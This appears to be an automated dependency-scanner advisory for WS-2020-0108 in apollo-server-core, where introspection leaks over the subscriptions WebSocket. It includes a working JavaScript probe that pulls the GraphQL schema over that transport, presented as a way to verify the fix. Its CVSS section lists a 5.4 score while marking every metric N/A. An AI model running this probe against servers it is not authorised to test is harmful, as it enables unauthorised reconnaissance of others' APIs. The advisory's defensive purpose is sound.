apollo-server-core before 2.14.2 is vulnerable to Information Exposure. The package does not apply its validation rules when creating the subscription server, so the NoIntrospection rule is not enforced on the WebSocket (subscriptions) transport. An introspection query sent over the subscriptions endpoint therefore leaks the GraphQL schema types, their relations and human-readable names.
## Vulnerable Library - apollo-server-core-2.8.1.tgz
Core engine for Apollo GraphQL server
Library home page: https://registry.npmjs.org/apollo-server-core/-/apollo-server-core-2.8.1.tgz
Found in HEAD commit: d3aa03c77002ed1f61a679726c02bc0494d073c2
## Vulnerabilities

| Vulnerability | Severity | CVSS 3 Score | Vulnerable Library | Fix Resolution |
| --- | --- | --- | --- | --- |
| WS-2020-0108 | Medium | 5.4 | apollo-server-core-2.8.1.tgz | 2.14.2 |
## Details

**WS-2020-0108**
### Vulnerable Library - apollo-server-core-2.8.1.tgz

Core engine for Apollo GraphQL server
Dependency Hierarchy:
- :x: **apollo-server-core-2.8.1.tgz** (Vulnerable Library)
Found in base branch: main
### Vulnerability Details

apollo-server-core before 2.14.2 is vulnerable to Information Exposure. The package does not apply its validation rules when creating the subscription server, so the NoIntrospection rule is not enforced on the WebSocket (subscriptions) transport. An introspection query sent over the subscriptions endpoint therefore leaks the GraphQL schema types, their relations and human-readable names.
Publish Date: 2020-06-05
URL: WS-2020-0108
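The practical check for this advisory is to send the same introspection query over the subscriptions WebSocket that is already blocked over HTTP and see whether `__schema` comes back. The code below is an added example written for this page; it is not code from apollo-server-core or the advisory. It assumes the legacy `graphql-ws` subprotocol used by Apollo Server 2.x subscriptions (`connection_init`, `connection_ack`, `start`, `data`, `error`, `complete` frames), and the live probe assumes a runtime with a global `WebSocket` (Node 22+ or a browser). The two sample frames and the error text are constructed, not captured from a real server.

```javascript
'use strict';

// Introspection query used as the probe. Any answer carrying __schema.types
// means the NoIntrospection validation rule was not applied on this transport.
const INTROSPECTION_PROBE_QUERY = `
  query ProbeIntrospection {
    __schema {
      types {
        name
        kind
        description
        fields { name }
      }
    }
  }`;

// Frames the client sends, in order, to run the probe over the subscriptions
// socket (legacy graphql-ws subprotocol: connection_init, then start).
function buildIntrospectionProbe(operationId = '1') {
  return [
    { type: 'connection_init', payload: {} },
    { type: 'start', id: operationId, payload: { query: INTROSPECTION_PROBE_QUERY } },
  ];
}

// Server-defined type names found in a leaked __schema (built-in __* types dropped).
function leakedTypeNames(frame) {
  const schema = frame && frame.payload && frame.payload.data && frame.payload.data.__schema;
  if (!schema || !Array.isArray(schema.types)) return [];
  return schema.types
    .map((t) => t.name)
    .filter((n) => typeof n === 'string' && !n.startsWith('__'));
}

// Classify one server frame for the probe operation:
//   'leaks'   - a data frame carrying __schema: introspection reachable over WebSocket
//   'blocked' - an error frame, or a data frame whose payload only carries errors
//   'other'   - ack, keep-alive, complete, or a frame for another operation id
function classifyResponse(frame, operationId = '1') {
  if (!frame || typeof frame !== 'object') return { verdict: 'other' };
  if (frame.id !== undefined && frame.id !== operationId) return { verdict: 'other' };
  if (frame.type === 'data' && frame.payload) {
    if (frame.payload.data && frame.payload.data.__schema) {
      return { verdict: 'leaks', types: leakedTypeNames(frame) };
    }
    if (Array.isArray(frame.payload.errors)) {
      return { verdict: 'blocked', messages: frame.payload.errors.map((e) => e.message) };
    }
  }
  if (frame.type === 'error') {
    return { verdict: 'blocked', messages: [frame.payload && frame.payload.message] };
  }
  return { verdict: 'other' };
}

// Live probe against a running server (assumes a global WebSocket). Resolves
// with the classification of the first frame that answers the probe operation.
function probeSubscriptionsEndpoint(url, { timeoutMs = 5000 } = {}) {
  return new Promise((resolve, reject) => {
    const ws = new WebSocket(url, 'graphql-ws');
    const [init, start] = buildIntrospectionProbe();
    const timer = setTimeout(() => { ws.close(); reject(new Error('probe timed out')); }, timeoutMs);
    ws.onopen = () => ws.send(JSON.stringify(init));
    ws.onerror = (e) => { clearTimeout(timer); reject(e); };
    ws.onmessage = (ev) => {
      const frame = JSON.parse(ev.data);
      if (frame.type === 'connection_ack') { ws.send(JSON.stringify(start)); return; }
      const result = classifyResponse(frame, start.id);
      if (result.verdict !== 'other') { clearTimeout(timer); ws.close(); resolve(result); }
    };
  });
}

// Constructed sample frames (hypothetical, not captured from a real server).
const SAMPLE_LEAK_FRAME = {
  type: 'data', id: '1',
  payload: { data: { __schema: { types: [
    { name: 'Query', kind: 'OBJECT', description: null, fields: [{ name: 'me' }] },
    { name: 'User', kind: 'OBJECT', description: 'An account', fields: [{ name: 'email' }] },
    { name: '__Schema', kind: 'OBJECT', description: null, fields: [{ name: 'types' }] },
  ] } } },
};
const SAMPLE_BLOCKED_FRAME = {
  type: 'data', id: '1',
  payload: { errors: [{ message: 'GraphQL introspection is not allowed, but the query contained __schema or __type' }] },
};

// Offline demonstration on the constructed frames.
console.log(classifyResponse(SAMPLE_LEAK_FRAME));    // verdict 'leaks', types ['Query', 'User']
console.log(classifyResponse(SAMPLE_BLOCKED_FRAME)); // verdict 'blocked'
```

Run `probeSubscriptionsEndpoint('ws://localhost:4000/graphql')` against a server with `introspection: false` on the HTTP endpoint: a `leaks` verdict on the WebSocket path is the condition this advisory describes, and after upgrading to 2.14.2 the same probe should come back `blocked`, since the fix makes the subscription server enforce the same validation rules as the HTTP path.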
### CVSS 3 Score Details (5.4)

Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: N/A
  - Attack Complexity: N/A
  - Privileges Required: N/A
  - User Interaction: N/A
  - Scope: N/A
- Impact Metrics:
  - Confidentiality Impact: N/A
  - Integrity Impact: N/A
  - Availability Impact: N/A
### Suggested Fix

Type: Upgrade version
Origin: https://github.com/advisories/GHSA-w42g-7vfc-xf37
Release Date: 2020-06-05
Fix Resolution: 2.14.2